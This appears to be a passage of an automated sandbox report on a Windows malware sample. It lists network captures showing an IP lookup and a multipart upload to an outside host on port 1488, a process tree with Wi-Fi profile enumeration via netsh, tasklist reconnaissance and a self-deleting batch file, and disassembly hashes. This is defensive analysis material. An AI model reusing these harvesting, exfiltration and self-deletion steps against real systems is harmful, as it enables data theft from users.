Dec 4, 2024 14:44:41.568753004 CET	1488	49747	89.23.100.233	192.168.11.20
Dec 4, 2024 14:44:41.568950891 CET	49747	1488	192.168.11.20	89.23.100.233
Dec 4, 2024 14:44:41.569106102 CET	49747	1488	192.168.11.20	89.23.100.233
Dec 4, 2024 14:44:41.830930948 CET	1488	49747	89.23.100.233	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 4, 2024 14:44:32.340034962 CET	54034	53	192.168.11.20	1.1.1.1
Dec 4, 2024 14:44:32.466788054 CET	53	54034	1.1.1.1	192.168.11.20
Dec 4, 2024 14:44:32.785752058 CET	61629	53	192.168.11.20	1.1.1.1
Dec 4, 2024 14:44:32.914283037 CET	53	61629	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 4, 2024 14:44:32.340034962 CET	192.168.11.20	1.1.1.1	0xf637	Standard query (0)	icanhazip.com	A (IP address)	IN (0x0001)	false
Dec 4, 2024 14:44:32.785752058 CET	192.168.11.20	1.1.1.1	0xd8f0	Standard query (0)	246.229.1.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 4, 2024 14:44:32.466788054 CET	1.1.1.1	192.168.11.20	0xf637	No error (0)	icanhazip.com		104.16.184.241	A (IP address)	IN (0x0001)	false
Dec 4, 2024 14:44:32.466788054 CET	1.1.1.1	192.168.11.20	0xf637	No error (0)	icanhazip.com		104.16.185.241	A (IP address)	IN (0x0001)	false
Dec 4, 2024 14:44:32.914283037 CET	1.1.1.1	192.168.11.20	0xd8f0	Name error (3)	246.229.1.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

icanhazip.com

89.23.100.233:1488

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.20	49746	104.16.184.241	80	3364	C:\Users\user\Desktop\VaXmr82RIb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 14:44:32.610554934 CET	63	OUT	GET / HTTP/1.1 Host: icanhazip.com Connection: Keep-Alive
Dec 4, 2024 14:44:32.748589993 CET	535	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 13:44:32 GMT Content-Type: text/plain Content-Length: 13 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET Set-Cookie: __cf_bm=Mcc8vVSY0xxAvHSTAfbZ8u77HtOxbWZBEW6eLfDCJPE-1733319872-1.0.1.1-wOKlxe61Fyd3UVOH137kRR71AVyeDaN4GFoWwTyZfpBxxtMC8UHgjj.Pjac4YTgzB0pousTWxmsYJeGCnmu8Uw; path=/; expires=Wed, 04-Dec-24 14:14:32 GMT; domain=.icanhazip.com; HttpOnly Server: cloudflare CF-RAY: 8ecc3b543bc88e03-MIA alt-svc: h3=":443"; ma=86400 Data Raw: 38 34 2e 31 37 2e 34 30 2e 31 31 30 0a Data Ascii: 84.17.40.110

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.11.20	49747	89.23.100.233	1488	3364	C:\Users\user\Desktop\VaXmr82RIb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 14:44:38.861116886 CET	205	OUT	POST /upload HTTP/1.1 Content-Type: multipart/form-data; boundary="f093b59e-f0fc-499e-9213-ca04fdeb1c2d" Host: 89.23.100.233:1488 Content-Length: 133518 Expect: 100-continue Connection: Keep-Alive
Dec 4, 2024 14:44:39.129076004 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 14:44:39.393357992 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 14:44:41.560194016 CET	165	IN	HTTP/1.1 200 OK Server: Werkzeug/3.1.3 Python/3.13.0 Date: Wed, 04 Dec 2024 13:44:41 GMT Content-Type: application/json Content-Length: 61 Connection: close

Target ID:	0
Start time:	08:44:29
Start date:	04/12/2024
Path:	C:\Users\user\Desktop\VaXmr82RIb.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\VaXmr82RIb.exe"
Imagebase:	0xff0000
File size:	816'640 bytes
MD5 hash:	3E11E285B883807EB038196EA1DE3CF8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	08:44:31
Start date:	04/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /c tasklist
Imagebase:	0x920000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	08:44:31
Start date:	04/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd" /C chcp 65001 && netsh wlan show profiles \| findstr All
Imagebase:	0x920000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	08:44:31
Start date:	04/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff791720000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	08:44:31
Start date:	04/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff791720000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	08:44:31
Start date:	04/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xf40000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	08:44:31
Start date:	04/12/2024
Path:	C:\Windows\SysWOW64\chcp.com
Wow64 process (32bit):	true
Commandline:	chcp 65001
Imagebase:	0xa20000
File size:	12'800 bytes
MD5 hash:	41146159AA3D41A92B53ED311EE15693
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	08:44:31
Start date:	04/12/2024
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh wlan show profiles
Imagebase:	0x7ff7f1760000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	08:44:31
Start date:	04/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr All
Imagebase:	0xae0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	08:44:46
Start date:	04/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmpF01E.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmpF01E.tmp.bat
Imagebase:	0x920000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	08:44:46
Start date:	04/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff791720000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	08:44:46
Start date:	04/12/2024
Path:	C:\Windows\SysWOW64\chcp.com
Wow64 process (32bit):	true
Commandline:	chcp 65001
Imagebase:	0xa20000
File size:	12'800 bytes
MD5 hash:	41146159AA3D41A92B53ED311EE15693
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	08:44:46
Start date:	04/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	TaskKill /F /IM 3364
Imagebase:	0x550000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	08:44:46
Start date:	04/12/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	Timeout /T 2 /Nobreak
Imagebase:	0xf00000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	08:44:46
Start date:	04/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3364 -s 3324
Imagebase:	0xe50000
File size:	482'640 bytes
MD5 hash:	40A149513D721F096DDF50C04DA2F01F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	29%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	29.9%
Total number of Nodes:	278
Total number of Limit Nodes:	26

Executed Functions

Function 034A1088 Relevance: 19.8, Strings: 10, Instructions: 7350COMMON

Download Yara Rule

Strings

1 a, xrefs: 034A4757
4?3, xrefs: 034A5A21
=:-D, xrefs: 034A4A7B
)w=, xrefs: 034A5D4E
&H"g, xrefs: 034A11B7
!;A, xrefs: 034A781F
*5C, xrefs: 034A7313
33, xrefs: 034A3FFD
8:5, xrefs: 034A131F
":C, xrefs: 034A5D31

Memory Dump Source

Source File: 00000000.00000002.30074489374.00000000034A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_34a0000_VaXmr82RIb.jbxd

Similarity

API ID:
String ID: !;A$":C$&H"g$)w=$*5C$1 a$33$4?3$8:5$=:-D
API String ID: 0-336136860
Opcode ID: 5f143397a984046e616da37dc7da363cb475ad5d3184ecb154145c5b219b8513
Instruction ID: 9015a463ae6923f77ebb077797e7562e97617660ffa91b8c3784cf8e0a81df43
Opcode Fuzzy Hash: 5f143397a984046e616da37dc7da363cb475ad5d3184ecb154145c5b219b8513
Instruction Fuzzy Hash: 44E34D79F112199FCB94DF68D880A9DB3B7EB89210F1581EAD409EB350DB35AE81CF40

Function 034ADB60 Relevance: 13.4, Strings: 9, Instructions: 2142COMMON

Download Yara Rule

Strings

Hnq, xrefs: 034ADCB3
(ojq, xrefs: 034ADDF9
Hnq, xrefs: 034ADFFC
Hnq, xrefs: 034AFB6A
;jq, xrefs: 034ADFB9
pnq, xrefs: 034AF270
\sjq, xrefs: 034ADE51
pnq, xrefs: 034AEB4B
(ojq, xrefs: 034AFBE9

Memory Dump Source

Source File: 00000000.00000002.30074489374.00000000034A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_34a0000_VaXmr82RIb.jbxd

Similarity

API ID:
String ID: (ojq$(ojq$Hnq$Hnq$Hnq$\sjq$pnq$pnq$;jq
API String ID: 0-1547469935
Opcode ID: 79ee424316a48a86a024003bbbec3205a1c5db8f3e67c6e7ada0495cec8039c3
Instruction ID: ebb242ed8985325ab8934ac6f52a26336cfcfab676e277e1fcfa9f26900e5468
Opcode Fuzzy Hash: 79ee424316a48a86a024003bbbec3205a1c5db8f3e67c6e7ada0495cec8039c3
Instruction Fuzzy Hash: E3039A75B006198FCB14DF69D8C4A99B7B2BF98200F1981AAE909EF361DB31DD85CF44

Function 089F0006 Relevance: 10.8, Strings: 5, Instructions: 4525
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

?"1, xrefs: 089F07B6
=#, xrefs: 089F46A2
p6c, xrefs: 089F1056
}+=, xrefs: 089F3515
9/'_, xrefs: 089F31F0, 089F3200, 089F3215, 089F3229, 089F3235

Memory Dump Source

Source File: 00000000.00000002.30088499667.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_89f0000_VaXmr82RIb.jbxd

Similarity

API ID:
String ID: p6c$9/'_$=#$?"1$}+=
API String ID: 0-3954522359
Opcode ID: d776c5f0073ac75f692ab9d8fa4cb0eab9ed305affdaa3e83ab6fff35d61c986
Instruction ID: 3fca1263118b51e891824e2bdc26bb514034b8cd57ca9a2bac08d01535c83db6
Opcode Fuzzy Hash: d776c5f0073ac75f692ab9d8fa4cb0eab9ed305affdaa3e83ab6fff35d61c986
Instruction Fuzzy Hash: 2FA3CBB4E0061C9FCB58DFA8C891A9EBBB2EF84314F2085E9D549A7354DB359E81CF44

Function 089F0040 Relevance: 10.8, Strings: 5, Instructions: 4500
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

?"1, xrefs: 089F07B6
=#, xrefs: 089F46A2
p6c, xrefs: 089F1056
}+=, xrefs: 089F3515
9/'_, xrefs: 089F31F0, 089F3200, 089F3215, 089F3229, 089F3235

Memory Dump Source

Source File: 00000000.00000002.30088499667.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_89f0000_VaXmr82RIb.jbxd

Similarity

API ID:
String ID: p6c$9/'_$=#$?"1$}+=
API String ID: 0-3954522359
Opcode ID: 1a7c13a0ad4baebda41d5dfeb7e08abdcb1434bdf729d41416f99eacbd4e021a
Instruction ID: af931bfa24de452121e2407134cd920b7d657779a6ff8b589bb9a8e3b1246f45
Opcode Fuzzy Hash: 1a7c13a0ad4baebda41d5dfeb7e08abdcb1434bdf729d41416f99eacbd4e021a
Instruction Fuzzy Hash: 01A3CBB4E0061C9FCB58DFA8C891A9EBBB2EF84314F2085E9D549A7354DB359E81CF44

Function 080E41A0 Relevance: 10.5, Strings: 5, Instructions: 4255COMMON

Download Yara Rule

Strings

(?8q, xrefs: 080E4509
\ Q, xrefs: 080E82A3
.*, xrefs: 080E6634
PHjq, xrefs: 080E5F9B
*$,3, xrefs: 080E5C32

Memory Dump Source

Source File: 00000000.00000002.30087746367.00000000080E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80e0000_VaXmr82RIb.jbxd

Similarity

API ID:
String ID: \ Q$(?8q$*$,3$.*$PHjq
API String ID: 0-1137169102
Opcode ID: 2bc9e5ddcb85739545d2c04defbd1829c31ac9d8f77cc09a5a08c5255b4c5c93
Instruction ID: 29ad96aefa331864a90b72f000d3e560295ec502f4d4415ab964f989a61ba54f
Opcode Fuzzy Hash: 2bc9e5ddcb85739545d2c04defbd1829c31ac9d8f77cc09a5a08c5255b4c5c93
Instruction Fuzzy Hash: D8839376E012288FCB54DF68D88469AB7F2BF88314F1585AED809EB351DB359D46CF80

Function 080E9F88 Relevance: 6.4, Strings: 3, Instructions: 2640COMMON

Download Yara Rule

Strings

6(;U, xrefs: 080EB00A
"T/l, xrefs: 080EB598
n>;, xrefs: 080EA9BE

Memory Dump Source

Source File: 00000000.00000002.30087746367.00000000080E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80e0000_VaXmr82RIb.jbxd

Similarity

API ID:
String ID: n>;$"T/l$6(;U
API String ID: 0-2473328630
Opcode ID: 4ecdf65f7f15fabe0f5a3f1a7eb5f8a4deba86b469e947c598886944843061dc
Instruction ID: 4b5b971a2b293cdcae73bcd142d10c02ee650e369618eabbb72ad9fab48109b7
Opcode Fuzzy Hash: 4ecdf65f7f15fabe0f5a3f1a7eb5f8a4deba86b469e947c598886944843061dc
Instruction Fuzzy Hash: 0B237376F102288FCB58DF68D89059AF7E3AB88310B15856DE849EB355DB35EC46CBC0

Function 089F8B08 Relevance: 5.3, Strings: 3, Instructions: 1590COMMON

Download Yara Rule

Strings

%Z7Q, xrefs: 089F99C1
$6, xrefs: 089F9710
"G8T, xrefs: 089FA172

Memory Dump Source

Source File: 00000000.00000002.30088499667.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_89f0000_VaXmr82RIb.jbxd

Similarity

API ID:
String ID: $6$"G8T$%Z7Q
API String ID: 0-608656841
Opcode ID: 7fc0238e280c81bec23a3e2d08808ee71f81bdb13e0765c48a0825dc3ee968b7
Instruction ID: dcb6d57d617691ef6e249d75fdb880fc08e1114c005a99bcb465878cabea79f7
Opcode Fuzzy Hash: 7fc0238e280c81bec23a3e2d08808ee71f81bdb13e0765c48a0825dc3ee968b7
Instruction Fuzzy Hash: 96E24276E102298FDB68DF68C884A99F7F2BB88314F1582A9D90DE7351D7709D85CF80

Function 089C4CC8 Relevance: 4.8, Strings: 3, Instructions: 1040
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

7?, xrefs: 089C4FE5
8=4, xrefs: 089C4D5F
1*M, xrefs: 089C5833

Memory Dump Source

Source File: 00000000.00000002.30088439310.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_89c0000_VaXmr82RIb.jbxd

Similarity

API ID:
String ID: 1*M$7?$8=4
API String ID: 0-575145823
Opcode ID: d973710a096a179cf3afed625714e9757c7b755f9efd1a539cedb5a80cbece8e
Instruction ID: 737332361994b49913a53b34cd7ee9e06d1445a7a634098fd0852d48c51e6e8a
Opcode Fuzzy Hash: d973710a096a179cf3afed625714e9757c7b755f9efd1a539cedb5a80cbece8e
Instruction Fuzzy Hash: 4082C476F006398BCB18DEA9C89059EF7E2BB8831071A816DDC19EB355D775AC11CBC1

Function 080E0990 Relevance: 4.6, APIs: 1, Strings: 1, Instructions: 1057
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 080E187A

Strings

'/3T, xrefs: 080E1351

Memory Dump Source

Source File: 00000000.00000002.30087746367.00000000080E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80e0000_VaXmr82RIb.jbxd

Similarity

API ID: CreateSnapshotToolhelp32
String ID: '/3T
API String ID: 3332741929-3084761499
Opcode ID: 9b90436b5e22cbc83b52d1bc6703663381fcc7290dd4c736eef08de8f19fa3b7
Instruction ID: 49b4cac0df56fd68ef05956ee692e4ab533e29fad802856fdd822d10f0dd0d81
Opcode Fuzzy Hash: 9b90436b5e22cbc83b52d1bc6703663381fcc7290dd4c736eef08de8f19fa3b7
Instruction Fuzzy Hash: 418209B6F006384BCB58DFB8C89166FB7E7AB84750B05456ED84AEB380DE349C058BD5

Function 07B32CB8 Relevance: 4.1, Strings: 3, Instructions: 354COMMON

Download Yara Rule

Strings

Hnq, xrefs: 07B32DCE
(nq, xrefs: 07B330CD
$jq, xrefs: 07B32EB9

Memory Dump Source

Source File: 00000000.00000002.30085838938.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b30000_VaXmr82RIb.jbxd

Similarity

API ID:
String ID: (nq$Hnq$$jq
API String ID: 0-1257844683
Opcode ID: 78a21e365bd2d5e0af5cffb3c2c7c2845fda9a8effbd96d030b9fc942282f5a1
Instruction ID: 19165c49b1e5d8e3e5df3490872f79c9015449fb784cb89981fdd3b68c898d2a
Opcode Fuzzy Hash: 78a21e365bd2d5e0af5cffb3c2c7c2845fda9a8effbd96d030b9fc942282f5a1
Instruction Fuzzy Hash: 61D104B1B102518FCB18DF68C89466ABBF2EF85300F1985AAC805DF391DB75DC85CB91

Function 080E2970 Relevance: 4.0, Strings: 2, Instructions: 1495COMMON

Download Yara Rule

Strings

PHjq, xrefs: 080E3C08
`<&;, xrefs: 080E2ABB

Memory Dump Source

Source File: 00000000.00000002.30087746367.00000000080E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80e0000_VaXmr82RIb.jbxd

Similarity

API ID:
String ID: PHjq$`<&;
API String ID: 0-3512224124
Opcode ID: 3c65ded2a4828540003026aebce184d799e0bd6733af5f5f6f4ff1dd4f784a58
Instruction ID: c1781f2cce853bfc4780091b5cb825b7f906a07ea05e5eb42e6d21c267fd855b
Opcode Fuzzy Hash: 3c65ded2a4828540003026aebce184d799e0bd6733af5f5f6f4ff1dd4f784a58
Instruction Fuzzy Hash: 5AC2A276B001258FC718DF69D89095AFBE3ABC831071A856EE809EB355DB75EC46CBC0

Function 07B3ECF0 Relevance: 3.7, Strings: 2, Instructions: 1242COMMON

Download Yara Rule

Strings

>3!, xrefs: 07B3F3DD
{%, xrefs: 07B3F5E2, 07B3F5E7

Memory Dump Source

Source File: 00000000.00000002.30085838938.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b30000_VaXmr82RIb.jbxd

Similarity

API ID:
String ID: >3!${%
API String ID: 0-2948576519
Opcode ID: cd87663f583d08788467d63e430522e1858c910a33da2f5aceda32b550c6896b
Instruction ID: 89181a15361f27bc9c612d888472a3e0200e20cbc9f736bc0a67198021ade841
Opcode Fuzzy Hash: cd87663f583d08788467d63e430522e1858c910a33da2f5aceda32b550c6896b
Instruction Fuzzy Hash: 00A2CAB5F006384FCB58DF78C89069EB7F7AB88310B1585AED909EB381DA349D458BD4

Function 07B3ECE1 Relevance: 3.5, Strings: 2, Instructions: 999COMMON

Download Yara Rule

Strings

>3!, xrefs: 07B3F3DD
{%, xrefs: 07B3F5E2, 07B3F5E7

Memory Dump Source

Source File: 00000000.00000002.30085838938.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b30000_VaXmr82RIb.jbxd

Similarity

API ID:
String ID: >3!${%
API String ID: 0-2948576519
Opcode ID: 2afc29c369666c4fe52c8a7abfaf3afb72e2f330fe9130d454eb2efe76633e56
Instruction ID: 703b869bdbf5e2c583828aed302ce19cf5f2041bb38b4c8d0678aa390b4843d8
Opcode Fuzzy Hash: 2afc29c369666c4fe52c8a7abfaf3afb72e2f330fe9130d454eb2efe76633e56
Instruction Fuzzy Hash: 9982D9B5F006384BCB58DF78C89069EB7E7AB88310B1585AED94DEB380DE349D458BC4

Function 089C0040 Relevance: 3.4, Strings: 1, Instructions: 2128COMMON

Download Yara Rule

Strings

<E8-, xrefs: 089C1E58

Memory Dump Source

Source File: 00000000.00000002.30088439310.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_89c0000_VaXmr82RIb.jbxd

Similarity

API ID:
String ID: <E8-
API String ID: 0-3215472544
Opcode ID: 149ff0beccaf7e0bcd0ee6c25899370ac4eb64b27826d24fa9155edd93e589b6
Instruction ID: bec879c9663bca13159a46203ba94c7f88f54aa24a161060f23614aa8a6f3421
Opcode Fuzzy Hash: 149ff0beccaf7e0bcd0ee6c25899370ac4eb64b27826d24fa9155edd93e589b6
Instruction Fuzzy Hash: D1236376E106298FCB25DF58C980699F7F6BB48310F5586E9D809EB341D734AE86CF80

Function 07B3E100 Relevance: 2.9, Strings: 2, Instructions: 441COMMON

Download Yara Rule

Strings

;g=i, xrefs: 07B3E1FF
)9+z, xrefs: 07B3E36C

Memory Dump Source

Source File: 00000000.00000002.30085838938.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b30000_VaXmr82RIb.jbxd

Similarity

API ID:
String ID: )9+z$;g=i
API String ID: 0-900698434
Opcode ID: e590018d1d93dd2fdaa7c1ee91bce2b7adc4563ed18493cd08ce9dca24c95e37
Instruction ID: fd20cad715139a52dd9ac46a6b814541218c5221244161bed00db1b6a736c690
Opcode Fuzzy Hash: e590018d1d93dd2fdaa7c1ee91bce2b7adc4563ed18493cd08ce9dca24c95e37
Instruction Fuzzy Hash: 88F1B5B5F002698FC714DFA8C89099ABBB6EF8435071585AAD809EB351DB35EC46CBD0

Function 034AC2A8 Relevance: 2.9, Strings: 2, Instructions: 355COMMON

Download Yara Rule

Strings

%Q$G, xrefs: 034AC34B
.+6a, xrefs: 034AC64C

Memory Dump Source

Source File: 00000000.00000002.30074489374.00000000034A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_34a0000_VaXmr82RIb.jbxd

Similarity

API ID:
String ID: %Q$G$.+6a
API String ID: 0-1834041138
Opcode ID: 6c37f342040de4a46e8be3031da90e0cd41446c04edc2f7d61d923f5d065c5ec
Instruction ID: fde2b9f6f7a3ca42135ec5f77de178393e42823cde0d556c17a5dcc307245875
Opcode Fuzzy Hash: 6c37f342040de4a46e8be3031da90e0cd41446c04edc2f7d61d923f5d065c5ec
Instruction Fuzzy Hash: 86B1F96FF20A354B8B98EA7D28D413EA1C7ABE8610319447ED907EF394DE68CC4543C9

Function 036071B0 Relevance: 2.9, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

Hnq, xrefs: 03607635
Hnq, xrefs: 0360761A

Memory Dump Source

Source File: 00000000.00000002.30074966285.0000000003600000.00000040.00000800.00020000.00000000.sdmp, Offset: 03600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3600000_VaXmr82RIb.jbxd

Similarity

API ID:
String ID: Hnq$Hnq
API String ID: 0-3075287205
Opcode ID: 740bef0e942ffccae9d395c70ad293ff2890840b0b86d92f58b5655185b6c739
Instruction ID: eb795e325ae8bb15363d865fdd8eccdc13232a508439847cf9a804ca2ef9f38f
Opcode Fuzzy Hash: 740bef0e942ffccae9d395c70ad293ff2890840b0b86d92f58b5655185b6c739
Instruction Fuzzy Hash: 93B1F376F142218BC70CDE7D889452FFAD6ABD8210B0D8D6EAC5AE7394DA34EC1587C1

Function 089FB9EE Relevance: 2.8, Strings: 2, Instructions: 289COMMON

Download Yara Rule

Strings

:>3O, xrefs: 089FBAEA
-Y+g, xrefs: 089FBF4C

Memory Dump Source

Source File: 00000000.00000002.30088499667.00000000089F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_89f0000_VaXmr82RIb.jbxd

Similarity

API ID:
String ID: -Y+g$:>3O
API String ID: 0-2428480409
Opcode ID: dea7207ec158947def012e2f6d6542b0388123966cfc80800c301ea05bbd3ee7
Instruction ID: 3689774f351963302368f964117139e345ed278ba1b7bc461d183125111b20c2
Opcode Fuzzy Hash: dea7207ec158947def012e2f6d6542b0388123966cfc80800c301ea05bbd3ee7
Instruction Fuzzy Hash: 33A1EE75B003058FCB18EFA9C9D069DB7B2AF89314B19C17AD906EF356DA74AC46CB40

Function 089C001E Relevance: 2.5, Strings: 1, Instructions: 1226COMMON

Download Yara Rule

Strings

<E8-, xrefs: 089C1E58

Memory Dump Source

Source File: 00000000.00000002.30088439310.00000000089C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_89c0000_VaXmr82RIb.jbxd

Similarity

API ID:
String ID: <E8-
API String ID: 0-3215472544
Opcode ID: 51e771e805ef138b83680332d717fef03e9ec68016d7662e0aa7399ed6d7745c
Instruction ID: e24bce4ddcadc4785c21f38cbf3a38dc6c925f1f261ddd91c7b0db975eb1fe95
Opcode Fuzzy Hash: 51e771e805ef138b83680332d717fef03e9ec68016d7662e0aa7399ed6d7745c
